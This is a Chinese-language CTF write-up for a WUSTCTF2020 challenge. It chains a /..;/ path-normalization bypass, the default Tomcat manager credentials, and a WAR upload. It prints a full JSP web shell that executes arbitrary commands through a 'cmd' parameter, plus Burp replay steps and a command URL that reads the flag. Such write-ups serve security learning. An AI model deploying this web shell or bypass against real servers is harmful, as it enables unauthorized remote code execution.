[WUSTCTF2020]Train Yourself To Be Godly
解题步骤
蜜汁网页,直接看wp。
建议把这个ppt看了,还能学点东西:https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
这道题用到了
打开
/..;/manager/html,然后默认密码tomcat tomcat登录tomcat后台。可以随便输入路径报错404发现tomcat版本为8。该版本有文件上传漏洞,可以在vulhub复现,详细可看:http://47.96.173.116/2021/06/15/vulhub-docker-tomcat8%e6%96%87%e4%bb%b6%e4%b8%8a%e4%bc%a0%e6%bc%8f%e6%b4%9e/在本地写jsp马:
<%@ page language="java" contentType="text/html; charset=GBK"
pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>一句话木马</title>
</head>
<body>
<%
if ("admin".equals(request.getParameter("pwd"))) {
java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int len = -1;
byte[] bytes = new byte[4092];
out.print("<pre>");
while ((len = input.read(bytes)) != -1) {
out.println(new String(bytes, "GBK"));
}
out.print("</pre>");
}
%>
</body>
</html>然后打包成zip,改后缀为war。上传前,先抓/..;/manager/html的包,放到burp的repeater,为了记住Authorization头而已
然后放包,在浏览器找到JSESSIONID,记录下来,然后抓住上传文件的包,加上
Authorization头和session,还有前面的examples/去掉
如果没报200,重复上面的工作,因为Authorization和session还有csrf的token都是一一对应的,而且csrf token还是一次性的。上传成功之后,回到
/..;/manager/html可以看到多了几个文件。我上传的asd.jsp在/..;/asd/asd.jsp。打开木马文件直接rce即可http://cee35e6e-40e7-42d6-9447-dcbb82b295a3.node4.buuoj.cn:81/..;/asd/asd.jsp?pwd=admin&cmd=cat%20/flagggg